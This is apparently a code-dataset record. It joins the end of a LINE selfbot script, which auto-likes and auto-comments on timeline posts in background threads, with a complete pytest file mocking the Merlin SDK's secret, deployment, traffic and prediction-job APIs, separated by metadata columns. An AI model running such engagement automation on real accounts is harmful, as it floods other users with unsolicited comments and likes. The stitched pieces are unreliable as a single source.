            # Best-effort: any network/profile error is swallowed so the
            # updater thread never dies.
            pass
# Start the clock display-name updater as a daemon thread so it terminates
# together with the main process.
thread2 = threading.Thread(target=nameUpdate)
thread2.daemon = True
thread2.start()
def autolike():
    # Background worker: polls the timeline feed (cl.activity) and, when the
    # corresponding flags in the global `wait` dict are enabled, auto-likes
    # and auto-comments on posts that are not yet liked.
    # NOTE(review): nesting reconstructed — indentation was lost in this
    # chunk; confirm that the commentOn branch sits inside the posts loop.
    count = 1
    while True:
        try:
            for posts in cl.activity(1)["result"]["posts"]:
                if posts["postInfo"]["liked"] is False:
                    if wait["likeOn"] == True:
                        # 1001 is the like-type code passed to the API.
                        cl.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
                        # ki.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
                        # ki2.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
                        # ki3.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
                        # ki4.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
                        # ki5.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
                        # ki6.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
                    if wait["commentOn"] == True:
                        # Skip authors on the comment blacklist.
                        if posts["userInfo"]["writerMid"] in wait["commentBlack"]:
                            pass
                        else:
                            cl.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
        except:
            # Count failures; after 50 of them stop this worker.
            # NOTE(review): sys.exit(0) raises SystemExit in this thread only,
            # so it ends the worker thread, not the whole process.
            count += 1
            if(count == 50):
                sys.exit(0)
            else:
                pass
# Start the auto-like/auto-comment worker as a daemon thread so it terminates
# together with the main process.
thread1 = threading.Thread(target=autolike)
thread1.daemon = True
thread1.start()
# Main event loop: long-poll for up to 5 operations at the current revision
# and dispatch each to bot(), advancing the stored revision so the next poll
# resumes where this one left off.
while True:
    try:
        Ops = cl.fetchOps(cl.Poll.rev, 5)
    except EOFError:
        # EOF from the long-poll usually means the revision is out of sync.
        raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
    for Op in Ops:
        if (Op.type != OpType.END_OF_OPERATION):
            # Track the highest revision seen so ops are not re-fetched.
            cl.Poll.rev = max(cl.Poll.rev, Op.revision)
            bot(Op)
| 49.487305
| 368
| 0.439131
| 22,234
| 263,124
| 5.277728
| 0.051003
| 0.03592
| 0.206212
| 0.239652
| 0.845993
| 0.810473
| 0.787328
| 0.761635
| 0.729072
| 0.714014
| 0.000049
| 0.029175
| 0.432176
| 263,124
| 5,316
| 369
| 49.496614
| 0.742216
| 0.054947
| 0
| 0.749331
| 0
| 0.001442
| 0.086264
| 0.004833
| 0.000412
| 0
| 0
| 0
| 0
| 0
| null | null | 0.014212
| 0.001236
| null | null | 0.014006
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
b3c3b0b91b1de9c5219ee8eff2552fa963637f23
| 35,479
|
py
|
Python
|
python/sdk/test/model_test.py
|
ashwinath/merlin
|
087a7fa6fb21e4c771d64418bd58873175226ca1
|
[
"Apache-2.0"
] | null | null | null |
python/sdk/test/model_test.py
|
ashwinath/merlin
|
087a7fa6fb21e4c771d64418bd58873175226ca1
|
[
"Apache-2.0"
] | null | null | null |
python/sdk/test/model_test.py
|
ashwinath/merlin
|
087a7fa6fb21e4c771d64418bd58873175226ca1
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2020 The Merlin Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import types
import pytest
from merlin.model import ModelType
from urllib3_mock import Responses
from unittest.mock import patch
import client as cl
from merlin.batch.config import PredictionJobConfig, ResultType
from merlin.batch.job import JobStatus
from merlin.batch.sink import BigQuerySink, SaveMode
from merlin.batch.source import BigQuerySource
from merlin.endpoint import VersionEndpoint
# ---------------------------------------------------------------------------
# Module-level fixtures shared by the test classes below.
# ---------------------------------------------------------------------------

# Intercepts HTTP traffic issued through requests' bundled urllib3.
responses = Responses('requests.packages.urllib3')

default_resource_request = cl.ResourceRequest(1, 1, "100m", "128Mi")
# env_1 is flagged as the default environment (4th positional arg True),
# env_2 is not.
env_1 = cl.Environment(1, "dev", "cluster-1", True, default_resource_request=default_resource_request)
env_2 = cl.Environment(2, "dev-2", "cluster-2", False, default_resource_request=default_resource_request)

# One "running" version endpoint per environment.
ep1 = cl.VersionEndpoint("1234", 1, "running", "localhost/1", "svc-1",
                         env_1.name, env_1, "grafana.com")
ep2 = cl.VersionEndpoint("4567", 1, "running", "localhost/1", "svc-2",
                         env_2.name, env_2, "grafana.com")

# Routing rules sending 100% of traffic to each endpoint, and the model
# endpoints built on top of them.
rule_1 = cl.ModelEndpointRule(destinations=[cl.ModelEndpointRuleDestination(
    ep1.id, weight=100)])
rule_2 = cl.ModelEndpointRule(destinations=[cl.ModelEndpointRuleDestination(
    ep2.id, weight=100)])
mdl_endpoint_1 = cl.ModelEndpoint(1, 1, None, "serving", "localhost/1", rule_1,
                                  env_1.name, env_1)
mdl_endpoint_2 = cl.ModelEndpoint(2, 1, None, "serving", "localhost/2", rule_2,
                                  env_2.name, env_2)

# Canonical batch prediction job configuration used by the job tests:
# BigQuery source -> PYFUNC_V2 model -> BigQuery sink, plus image,
# service-account, and Spark resource settings.
config = {
    "job_config": {
        "version": "v1",
        "kind": "PredictionJob",
        "name": "job-1",
        "bigquery_source": {
            "table": "project.dataset.source_table",
            "features": [
                "feature_1",
                "feature_2"
            ],
            "options": {
                "key": "val",
            }
        },
        "model": {
            "type": "PYFUNC_V2",
            "uri": "gs://my-model/model",
            "result": {
                "type": "DOUBLE"
            },
            "options": {
                "key": "val",
            }
        },
        "bigquery_sink": {
            "table": "project.dataset.result_table",
            "staging_bucket": "gs://test",
            "result_column": "prediction",
            "save_mode": "OVERWRITE",
            "options": {
                "key": "val",
            }
        }
    },
    "image_ref": "asia.gcr.io/my-image:1",
    "service_account_name": "my-service-account",
    "resource_request": {
        "driver_cpu_request": "1",
        "driver_memory_request": "1Gi",
        "executor_cpu_request": "1",
        "executor_memory_request": "1Gi",
        "executor_replica": 1
    }
}

# Two pending jobs; job_2 carries a non-empty error string.
# NOTE(review): several tests mutate job_1.status in place, so tests that
# read these fixtures are order-sensitive.
job_1 = cl.PredictionJob(id=1, name="job-1", version_id=1, model_id=1, config=config, status="pending", error="",
                         created_at="2019-08-29T08:13:12.377Z",
                         updated_at="2019-08-29T08:13:12.377Z")
job_2 = cl.PredictionJob(id=2, name="job-2", version_id=1, model_id=1, config=config, status="pending", error="error",
                         created_at="2019-08-29T08:13:12.377Z",
                         updated_at="2019-08-29T08:13:12.377Z")
class TestProject:
    """Tests for Project secret management (create/update/delete/list)."""

    secret_1 = cl.Secret(id=1, name="secret-1", data="secret-data-1")
    secret_2 = cl.Secret(id=2, name="secret-2", data="secret-data-2")

    @responses.activate
    def test_create_secret(self, project):
        """The POST body carries the secret's name and data verbatim."""
        responses.add("POST", '/v1/projects/1/secrets',
                      body=json.dumps(self.secret_1.to_dict()),
                      status=200,
                      content_type='application/json')
        project.create_secret(self.secret_1.name, self.secret_1.data)
        actual_body = json.loads(responses.calls[0].request.body)
        assert actual_body["name"] == self.secret_1.name
        assert actual_body["data"] == self.secret_1.data

    @responses.activate
    def test_update_secret(self, project):
        """Update resolves the secret id via a GET listing, then PATCHes the new data."""
        responses.add("GET", '/v1/projects/1/secrets',
                      body=json.dumps([self.secret_1.to_dict(), self.secret_2.to_dict()]),
                      status=200,
                      content_type='application/json')
        responses.add("PATCH", '/v1/projects/1/secrets/1',
                      body=json.dumps(self.secret_1.to_dict()),
                      status=200,
                      content_type='application/json')
        project.update_secret(self.secret_1.name, "new-data")
        # calls[1] is the PATCH (calls[0] is the listing GET).
        actual_body = json.loads(responses.calls[1].request.body)
        assert actual_body["name"] == self.secret_1.name
        assert actual_body["data"] == "new-data"
        responses.reset()
        # test secret not found
        responses.add("GET", '/v1/projects/1/secrets',
                      body=json.dumps([self.secret_1.to_dict()]),
                      status=200,
                      content_type='application/json')
        with pytest.raises(ValueError, match=f"unable to find secret {self.secret_2.name} in project {project.name}"):
            project.update_secret(self.secret_2.name, "new-data")

    @responses.activate
    def test_delete_secret(self, project):
        """Delete resolves the secret id via GET, then issues DELETE; unknown names raise."""
        responses.add("GET", '/v1/projects/1/secrets',
                      body=json.dumps([self.secret_1.to_dict(), self.secret_2.to_dict()]),
                      status=200,
                      content_type='application/json')
        responses.add("DELETE", '/v1/projects/1/secrets/1',
                      status=204,
                      content_type='application/json')
        project.delete_secret(self.secret_1.name)
        responses.reset()
        # test secret not found
        responses.add("GET", '/v1/projects/1/secrets',
                      body=json.dumps([self.secret_1.to_dict()]),
                      status=200,
                      content_type='application/json')
        with pytest.raises(ValueError, match=f"unable to find secret {self.secret_2.name} in project {project.name}"):
            project.delete_secret(self.secret_2.name)

    @responses.activate
    def test_list_secret(self, project):
        """list_secret returns only the names of the project's secrets."""
        responses.add("GET", '/v1/projects/1/secrets',
                      body=json.dumps([self.secret_1.to_dict(), self.secret_2.to_dict()]),
                      status=200,
                      content_type='application/json')
        secret_names = project.list_secret()
        assert secret_names == [self.secret_1.name, self.secret_2.name]
class TestModelVersion:
    @responses.activate
    def test_endpoint(self, version):
        """version.endpoint is None when no endpoint qualifies, else maps the match.

        NOTE(review): with only ep2 (non-default env) listed, the property
        resolves to None — presumably it selects the default environment's
        endpoint; confirm against merlin.model.
        """
        responses.add("GET", '/v1/models/1/versions/1/endpoint',
                      body=json.dumps([ep2.to_dict()]),
                      status=200,
                      content_type='application/json')
        ep = version.endpoint
        assert ep is None
        responses.reset()
        # With both endpoints present, ep1 is the one surfaced.
        responses.add("GET", '/v1/models/1/versions/1/endpoint',
                      body=json.dumps([ep1.to_dict(), ep2.to_dict()]),
                      status=200,
                      content_type='application/json')
        ep = version.endpoint
        assert ep.id == ep1.id
        assert ep.status.value == ep1.status
        assert ep.environment_name == ep1.environment_name
        assert ep.url.startswith(ep1.url)
@responses.activate
def test_list_endpoint(self, version):
responses.add("GET", '/v1/models/1/versions/1/endpoint',
body=json.dumps([ep1.to_dict(), ep2.to_dict()]),
status=200,
content_type='application/json')
endpoints = version.list_endpoint()
assert len(endpoints) == 2
assert endpoints[0].id == ep1.id
assert endpoints[1].id == ep2.id
    @responses.activate
    def test_deploy(self, version):
        """Deploying to a named environment returns the mapped VersionEndpoint."""
        # The environment listing is fetched first so the name can be resolved.
        responses.add("GET", '/v1/environments',
                      body=json.dumps(
                          [env_1.to_dict(), env_2.to_dict()]),
                      status=200,
                      content_type='application/json')
        responses.add("POST", '/v1/models/1/versions/1/endpoint',
                      body=json.dumps(ep1.to_dict()),
                      status=200,
                      content_type='application/json')
        endpoint = version.deploy(environment_name=env_1.name)
        assert endpoint.id == ep1.id
        assert endpoint.status.value == ep1.status
        assert endpoint.environment_name == ep1.environment_name
        assert endpoint.environment.cluster == env_1.cluster
        assert endpoint.environment.name == env_1.name
    @responses.activate
    def test_deploy_default_env(self, version):
        """Deploy without a name uses the default environment; raise if none exists."""
        # no default environment (env_2 is not flagged default)
        responses.add("GET", '/v1/environments',
                      body=json.dumps(
                          [env_2.to_dict()]),
                      status=200,
                      content_type='application/json')
        with pytest.raises(ValueError):
            version.deploy()
        # default environment exists
        responses.reset()
        responses.add("GET", '/v1/environments',
                      body=json.dumps(
                          [env_1.to_dict(), env_2.to_dict()]),
                      status=200,
                      content_type='application/json')
        responses.add("POST", '/v1/models/1/versions/1/endpoint',
                      body=json.dumps(ep1.to_dict()),
                      status=200,
                      content_type='application/json')
        endpoint = version.deploy()
        assert endpoint.id == ep1.id
        assert endpoint.status.value == ep1.status
        assert endpoint.environment_name == ep1.environment_name
        assert endpoint.environment.cluster == env_1.cluster
        assert endpoint.environment.name == env_1.name
    @responses.activate
    def test_undeploy(self, version):
        """Undeploy only issues a DELETE when an endpoint exists in the target env."""
        # Phase 1: only ep2 (env_2) exists, so undeploying env_1 is a no-op —
        # the single recorded call is the GET listing.
        responses.add("GET", '/v1/models/1/versions/1/endpoint',
                      body=json.dumps([ep2.to_dict()]),
                      status=200,
                      content_type='application/json')
        version.undeploy(environment_name=env_1.name)
        assert len(responses.calls) == 1
        responses.reset()
        # Phase 2: ep1 exists in env_1, so undeploy performs GET then DELETE.
        responses.add("GET", '/v1/models/1/versions/1/endpoint',
                      body=json.dumps([ep1.to_dict(), ep2.to_dict()]),
                      status=200,
                      content_type='application/json')
        responses.add("DELETE", '/v1/models/1/versions/1/endpoint/1234',
                      body=json.dumps(ep1.to_dict()),
                      status=200,
                      content_type='application/json')
        version.undeploy(environment_name=env_1.name)
        assert len(responses.calls) == 2
    @responses.activate
    def test_undeploy_default_env(self, version):
        """Undeploy without a name falls back to the default environment."""
        # no default environment
        responses.add("GET", '/v1/environments',
                      body=json.dumps(
                          [env_2.to_dict()]),
                      status=200,
                      content_type='application/json')
        with pytest.raises(ValueError):
            # NOTE(review): this calls deploy() in an undeploy test — looks
            # like a copy-paste from test_deploy_default_env; confirm whether
            # it should be version.undeploy().
            version.deploy()
        responses.reset()
        # Default env exists but has no endpoint: GET envs + GET endpoints only.
        responses.add("GET", '/v1/environments',
                      body=json.dumps(
                          [env_1.to_dict(), env_2.to_dict()]),
                      status=200,
                      content_type='application/json')
        responses.add("GET", '/v1/models/1/versions/1/endpoint',
                      body=json.dumps([ep2.to_dict()]),
                      status=200,
                      content_type='application/json')
        version.undeploy()
        assert len(responses.calls) == 2
        responses.reset()
        # Default env has ep1: GET envs + GET endpoints + DELETE.
        responses.add("GET", '/v1/environments',
                      body=json.dumps(
                          [env_1.to_dict(), env_2.to_dict()]),
                      status=200,
                      content_type='application/json')
        responses.add("GET", '/v1/models/1/versions/1/endpoint',
                      body=json.dumps([ep1.to_dict(), ep2.to_dict()]),
                      status=200,
                      content_type='application/json')
        responses.add("DELETE", '/v1/models/1/versions/1/endpoint/1234',
                      body=json.dumps(ep1.to_dict()),
                      status=200,
                      content_type='application/json')
        version.undeploy()
        assert len(responses.calls) == 3
@responses.activate
def test_list_prediction_job(self, version):
responses.add(method="GET", url='/v1/models/1/versions/1/jobs',
body=json.dumps([job_1.to_dict(), job_2.to_dict()]),
status=200,
content_type='application/json')
jobs = version.list_prediction_job()
assert len(jobs) == 2
assert jobs[0].id == job_1.id
assert jobs[0].name == job_1.name
assert jobs[0].status == JobStatus(job_1.status)
assert jobs[0].error == job_1.error
assert jobs[1].id == job_2.id
assert jobs[1].name == job_2.name
assert jobs[1].status == JobStatus(job_2.status)
assert jobs[1].error == job_2.error
    @responses.activate
    def test_create_prediction_job(self, version):
        """Job creation posts the serialized config and maps the API response."""
        # NOTE(review): mutates the shared module-level job_1 fixture, making
        # tests that read its status order-sensitive.
        job_1.status = "completed"
        responses.add("POST", '/v1/models/1/versions/1/jobs',
                      body=json.dumps(job_1.to_dict()),
                      status=200,
                      content_type='application/json')
        bq_src = BigQuerySource(table="project.dataset.source_table",
                                features=["feature_1", "feature2"],
                                options={"key": "val"})
        bq_sink = BigQuerySink(table="project.dataset.result_table",
                               result_column="prediction",
                               save_mode=SaveMode.OVERWRITE,
                               staging_bucket="gs://test",
                               options={"key": "val"})
        job_config = PredictionJobConfig(source=bq_src,
                                         sink=bq_sink,
                                         service_account_name="my-service-account",
                                         result_type=ResultType.INTEGER)
        j = version.create_prediction_job(job_config=job_config)
        assert j.status == JobStatus.COMPLETED
        assert j.id == job_1.id
        assert j.error == job_1.error
        assert j.name == job_1.name
        # The request body must round-trip the source/sink/model settings.
        actual_req = json.loads(responses.calls[0].request.body)
        assert actual_req["config"]["job_config"]["bigquery_source"] == bq_src.to_dict()
        assert actual_req["config"]["job_config"]["bigquery_sink"] == bq_sink.to_dict()
        assert actual_req["config"]["job_config"]["model"]["result"]["type"] == ResultType.INTEGER.value
        assert actual_req["config"]["job_config"]["model"]["uri"] == f"{version.artifact_uri}/model"
        assert actual_req["config"]["job_config"]["model"]["type"] == ModelType.PYFUNC_V2.value.upper()
        assert actual_req["config"]["service_account_name"] == "my-service-account"
    @patch("merlin.model.DEFAULT_PREDICTION_JOB_DELAY", 0)
    @patch("merlin.model.DEFAULT_PREDICTION_JOB_RETRY_DELAY", 0)
    @responses.activate
    def test_create_prediction_job_with_retry_failed(self, version):
        """Five consecutive 500s on the job-status poll exhaust retries and raise ValueError."""
        job_1.status = "pending"
        responses.add("POST", '/v1/models/1/versions/1/jobs',
                      body=json.dumps(job_1.to_dict()),
                      status=200,
                      content_type='application/json')
        # Register five failing GETs for the status poll.
        for i in range(5):
            responses.add("GET", '/v1/models/1/versions/1/jobs/1',
                          body=json.dumps(job_1.to_dict()),
                          status=500,
                          content_type='application/json')
        bq_src = BigQuerySource(table="project.dataset.source_table",
                                features=["feature_1", "feature2"],
                                options={"key": "val"})
        bq_sink = BigQuerySink(table="project.dataset.result_table",
                               result_column="prediction",
                               save_mode=SaveMode.OVERWRITE,
                               staging_bucket="gs://test",
                               options={"key": "val"})
        job_config = PredictionJobConfig(source=bq_src,
                                         sink=bq_sink,
                                         service_account_name="my-service-account",
                                         result_type=ResultType.INTEGER)
        with pytest.raises(ValueError):
            j = version.create_prediction_job(job_config=job_config)
            # NOTE(review): once the ValueError is raised, these assertions
            # are unreachable (and `j` would be unbound outside the `with`)
            # — likely leftovers from a copied test; confirm intent.
            assert j.id == job_1.id
            assert j.error == job_1.error
            assert j.name == job_1.name
        # 1 POST + 5 failed GET polls.
        assert len(responses.calls) == 6
    @patch("merlin.model.DEFAULT_PREDICTION_JOB_DELAY", 0)
    @patch("merlin.model.DEFAULT_PREDICTION_JOB_RETRY_DELAY", 0)
    @responses.activate
    def test_create_prediction_job_with_retry_success(self, version):
        """Four 500s followed by a 200 on the status poll still yield a completed job."""
        job_1.status = "pending"
        responses.add("POST", '/v1/models/1/versions/1/jobs',
                      body=json.dumps(job_1.to_dict()),
                      status=200,
                      content_type='application/json')
        # Patch the method as currently it is not supported in the library
        # https://github.com/getsentry/responses/issues/135
        def _find_match(self, request):
            # Copy of the library's matcher; used to restore behavior at the
            # end of this test (see the unpatch at the bottom).
            for match in self._urls:
                if request.method == match['method'] and \
                        self._has_url_match(match, request.url):
                    return match
        def _find_match_patched(self, request):
            # Like _find_match, but consumes (pops) each registered mock for
            # the job-status URL, so successive polls see 4x 500 then a 200.
            for index, match in enumerate(self._urls):
                if request.method == match['method'] and \
                        self._has_url_match(match, request.url):
                    if request.method == "GET" and request.url == "/v1/models/1/versions/1/jobs/1":
                        return self._urls.pop(index)
                    else:
                        return match
        responses._find_match = types.MethodType(_find_match_patched, responses)
        for i in range(4):
            responses.add("GET", '/v1/models/1/versions/1/jobs/1',
                          body=json.dumps(job_1.to_dict()),
                          status=500,
                          content_type='application/json')
        job_1.status = "completed"
        responses.add("GET", '/v1/models/1/versions/1/jobs/1',
                      body=json.dumps(job_1.to_dict()),
                      status=200,
                      content_type='application/json')
        bq_src = BigQuerySource(table="project.dataset.source_table",
                                features=["feature_1", "feature2"],
                                options={"key": "val"})
        bq_sink = BigQuerySink(table="project.dataset.result_table",
                               result_column="prediction",
                               save_mode=SaveMode.OVERWRITE,
                               staging_bucket="gs://test",
                               options={"key": "val"})
        job_config = PredictionJobConfig(source=bq_src,
                                         sink=bq_sink,
                                         service_account_name="my-service-account",
                                         result_type=ResultType.INTEGER)
        j = version.create_prediction_job(job_config=job_config)
        assert j.status == JobStatus.COMPLETED
        assert j.id == job_1.id
        assert j.error == job_1.error
        assert j.name == job_1.name
        actual_req = json.loads(responses.calls[0].request.body)
        assert actual_req["config"]["job_config"]["bigquery_source"] == bq_src.to_dict()
        assert actual_req["config"]["job_config"]["bigquery_sink"] == bq_sink.to_dict()
        assert actual_req["config"]["job_config"]["model"]["result"]["type"] == ResultType.INTEGER.value
        assert actual_req["config"]["job_config"]["model"]["uri"] == f"{version.artifact_uri}/model"
        assert actual_req["config"]["job_config"]["model"]["type"] == ModelType.PYFUNC_V2.value.upper()
        assert actual_req["config"]["service_account_name"] == "my-service-account"
        # 1 POST + 4 failed GETs + 1 successful GET.
        assert len(responses.calls) == 6
        # unpatch: restore the stock matcher for subsequent tests
        responses._find_match = types.MethodType(_find_match, responses)
@patch("merlin.model.DEFAULT_PREDICTION_JOB_DELAY", 0)
@patch("merlin.model.DEFAULT_PREDICTION_JOB_RETRY_DELAY", 0)
@responses.activate
def test_create_prediction_job_with_retry_pending_then_failed(self, version):
job_1.status = "pending"
responses.add("POST", '/v1/models/1/versions/1/jobs',
body=json.dumps(job_1.to_dict()),
status=200,
content_type='application/json')
# Patch the method as currently it is not supported in the library
# https://github.com/getsentry/responses/issues/135
def _find_match(self, request):
for match in self._urls:
if request.method == match['method'] and \
self._has_url_match(match, request.url):
return match
def _find_match_patched(self, request):
for index, match in enumerate(self._urls):
if request.method == match['method'] and \
self._has_url_match(match, request.url):
if request.method == "GET" and request.url == "/v1/models/1/versions/1/jobs/1":
return self._urls.pop(index)
else:
return match
responses._find_match = types.MethodType(_find_match_patched, responses)
for i in range(3):
responses.add("GET", '/v1/models/1/versions/1/jobs/1',
body=json.dumps(job_1.to_dict()),
status=500,
content_type='application/json')
responses.add("GET", '/v1/models/1/versions/1/jobs/1',
body=json.dumps(job_1.to_dict()),
status=200,
content_type='application/json')
job_1.status = "failed"
for i in range(5):
responses.add("GET", '/v1/models/1/versions/1/jobs/1',
body=json.dumps(job_1.to_dict()),
status=500,
content_type='application/json')
bq_src = BigQuerySource(table="project.dataset.source_table",
features=["feature_1", "feature2"],
options={"key": "val"})
bq_sink = BigQuerySink(table="project.dataset.result_table",
result_column="prediction",
save_mode=SaveMode.OVERWRITE,
staging_bucket="gs://test",
options={"key": "val"})
job_config = PredictionJobConfig(source=bq_src,
sink=bq_sink,
service_account_name="my-service-account",
result_type=ResultType.INTEGER)
with pytest.raises(ValueError):
j = version.create_prediction_job(job_config=job_config)
assert j.id == job_1.id
assert j.error == job_1.error
assert j.name == job_1.name
# unpatch
responses._find_match = types.MethodType(_find_match, responses)
assert len(responses.calls) == 10
@responses.activate
def test_stop_prediction_job(self, version):
job_1.status = "pending"
responses.add("POST", '/v1/models/1/versions/1/jobs',
body=json.dumps(job_1.to_dict()),
status=200,
content_type='application/json')
responses.add("PUT", '/v1/models/1/versions/1/jobs/1/stop',
status=204,
content_type='application/json')
job_1.status = "terminated"
responses.add("GET", '/v1/models/1/versions/1/jobs/1',
body=json.dumps(job_1.to_dict()),
status=200,
content_type='application/json')
bq_src = BigQuerySource(table="project.dataset.source_table",
features=["feature_1", "feature2"],
options={"key": "val"})
bq_sink = BigQuerySink(table="project.dataset.result_table",
result_column="prediction",
save_mode=SaveMode.OVERWRITE,
staging_bucket="gs://test",
options={"key": "val"})
job_config = PredictionJobConfig(source=bq_src,
sink=bq_sink,
service_account_name="my-service-account",
result_type=ResultType.INTEGER)
j = version.create_prediction_job(job_config=job_config, sync=False)
j = j.stop()
assert j.status == JobStatus.TERMINATED
assert j.id == job_1.id
assert j.error == job_1.error
assert j.name == job_1.name
class TestModel:
v1 = cl.Version(id=1, model_id=1)
v2 = cl.Version(id=2, model_id=1)
@responses.activate
def test_list_version(self, model):
responses.add("GET", "/v1/models/1/versions?limit=50&cursor=&search=",
match_querystring=True,
body=json.dumps([self.v1.to_dict()]),
status=200,
adding_headers={"Next-Cursor": "abcdef"},
content_type='application/json')
responses.add("GET", "/v1/models/1/versions?limit=50&cursor=abcdef&search=",
match_querystring=True,
body=json.dumps([self.v2.to_dict()]),
status=200,
content_type='application/json')
versions = model.list_version()
assert len(versions) == 2
assert versions[0].id == 1
assert versions[1].id == 2
@responses.activate
def test_list_endpoint(self, model):
responses.add("GET", '/v1/models/1/endpoints',
body=json.dumps(
[mdl_endpoint_1.to_dict(),
mdl_endpoint_2.to_dict()]),
status=200,
content_type='application/json')
endpoints = model.list_endpoint()
assert len(endpoints) == 2
assert endpoints[0].id == str(mdl_endpoint_1.id)
assert endpoints[1].id == str(mdl_endpoint_2.id)
v = model.get_version(1)
assert v.id == 1
assert model.get_version(3) is None
@responses.activate
def test_list_endpoint(self, model):
responses.add("GET", '/v1/models/1/endpoints',
body=json.dumps(
[mdl_endpoint_1.to_dict(),
mdl_endpoint_2.to_dict()]),
status=200,
content_type='application/json')
endpoints = model.list_endpoint()
assert len(endpoints) == 2
assert endpoints[0].id == str(mdl_endpoint_1.id)
assert endpoints[1].id == str(mdl_endpoint_2.id)
@responses.activate
def test_serve_traffic(self, model):
ve = VersionEndpoint(ep1)
with pytest.raises(ValueError):
model.serve_traffic([ve], environment_name=env_1.name)
with pytest.raises(ValueError):
model.serve_traffic({ve: -1}, environment_name=env_1.name)
with pytest.raises(ValueError):
model.serve_traffic({ve: 101}, environment_name=env_1.name)
with pytest.raises(ValueError):
model.serve_traffic({VersionEndpoint(ep2): 100},
environment_name=env_1.name)
# test create
responses.add("GET", '/v1/models/1/endpoints',
body=json.dumps(
[]),
status=200,
content_type='application/json')
responses.add("POST", '/v1/models/1/endpoints',
body=json.dumps(mdl_endpoint_1.to_dict()),
status=200,
content_type='application/json')
endpoint = model.serve_traffic({ve: 100}, environment_name=env_1.name)
assert endpoint.id == str(mdl_endpoint_1.id)
assert endpoint.environment_name == env_1.name == mdl_endpoint_1.environment_name
responses.reset()
# test update
responses.add("GET", '/v1/models/1/endpoints',
body=json.dumps([mdl_endpoint_1.to_dict()]),
status=200,
content_type='application/json')
responses.add("GET", '/v1/models/1/endpoints/1',
body=json.dumps(mdl_endpoint_1.to_dict()),
status=200,
content_type='application/json')
responses.add("PUT", '/v1/models/1/endpoints/1',
body=json.dumps(mdl_endpoint_1.to_dict()),
status=200,
content_type='application/json')
endpoint = model.serve_traffic({ve: 100}, environment_name=env_1.name)
assert endpoint.id == str(mdl_endpoint_1.id)
assert endpoint.environment_name == env_1.name == mdl_endpoint_1.environment_name
@responses.activate
def test_stop_serving_traffic(self, model):
ve = VersionEndpoint(ep1)
with pytest.raises(ValueError):
model.serve_traffic([ve], environment_name=env_1.name)
with pytest.raises(ValueError):
model.serve_traffic({ve: -1}, environment_name=env_1.name)
with pytest.raises(ValueError):
model.serve_traffic({ve: 101}, environment_name=env_1.name)
with pytest.raises(ValueError):
model.serve_traffic({VersionEndpoint(ep2): 100},
environment_name=env_1.name)
# test create
responses.add("GET", '/v1/models/1/endpoints',
body=json.dumps(
[]),
status=200,
content_type='application/json')
responses.add("POST", '/v1/models/1/endpoints',
body=json.dumps(mdl_endpoint_1.to_dict()),
status=200,
content_type='application/json')
endpoint = model.serve_traffic({ve: 100}, environment_name=env_1.name)
assert endpoint.id == str(mdl_endpoint_1.id)
assert endpoint.environment_name == env_1.name == mdl_endpoint_1.environment_name
responses.reset()
# test DELETE
responses.reset()
responses.add("GET", '/v1/models/1/endpoints',
body=json.dumps([mdl_endpoint_1.to_dict()]),
status=200,
content_type='application/json')
responses.add("GET", '/v1/models/1/endpoints/1',
body=json.dumps(mdl_endpoint_1.to_dict()),
status=200,
content_type='application/json')
responses.add("DELETE", '/v1/models/1/endpoints/1',
status=200,
content_type='application/json')
model.stop_serving_traffic(endpoint.environment_name)
assert len(responses.calls) == 2
@responses.activate
def test_serve_traffic_default_env(self, model):
ve = VersionEndpoint(ep1)
# no default environment
responses.add("GET", '/v1/environments',
body=json.dumps(
[env_2.to_dict()]),
status=200,
content_type='application/json')
with pytest.raises(ValueError):
model.serve_traffic({ve: 100})
responses.reset()
# test create
responses.add("GET", '/v1/environments',
body=json.dumps(
[env_1.to_dict(), env_2.to_dict()]),
status=200,
content_type='application/json')
responses.add("GET", '/v1/models/1/endpoints',
body=json.dumps(
[]),
status=200,
content_type='application/json')
responses.add("POST", '/v1/models/1/endpoints',
body=json.dumps(mdl_endpoint_1.to_dict()),
status=200,
content_type='application/json')
endpoint = model.serve_traffic({ve: 100})
assert endpoint.id == str(mdl_endpoint_1.id)
assert endpoint.environment_name == env_1.name == mdl_endpoint_1.environment_name
responses.reset()
# test update
responses.add("GET", '/v1/environments',
body=json.dumps(
[env_1.to_dict(), env_2.to_dict()]),
status=200,
content_type='application/json')
responses.add("GET", '/v1/models/1/endpoints',
body=json.dumps([mdl_endpoint_1.to_dict()]),
status=200,
content_type='application/json')
responses.add("GET", '/v1/models/1/endpoints/1',
body=json.dumps(mdl_endpoint_1.to_dict()),
status=200,
content_type='application/json')
responses.add("PUT", '/v1/models/1/endpoints/1',
body=json.dumps(mdl_endpoint_1.to_dict()),
status=200,
content_type='application/json')
endpoint = model.serve_traffic({ve: 100})
assert endpoint.id == str(mdl_endpoint_1.id)
assert endpoint.environment_name == env_1.name == mdl_endpoint_1.environment_name
| 43.532515
| 118
| 0.536627
| 3,790
| 35,479
| 4.83905
| 0.077045
| 0.024537
| 0.073173
| 0.086478
| 0.859978
| 0.81374
| 0.788441
| 0.775954
| 0.762977
| 0.752563
| 0
| 0.034253
| 0.344175
| 35,479
| 814
| 119
| 43.585995
| 0.753954
| 0.02858
| 0
| 0.763473
| 0
| 0
| 0.152877
| 0.068016
| 0
| 0
| 0
| 0
| 0.136228
| 1
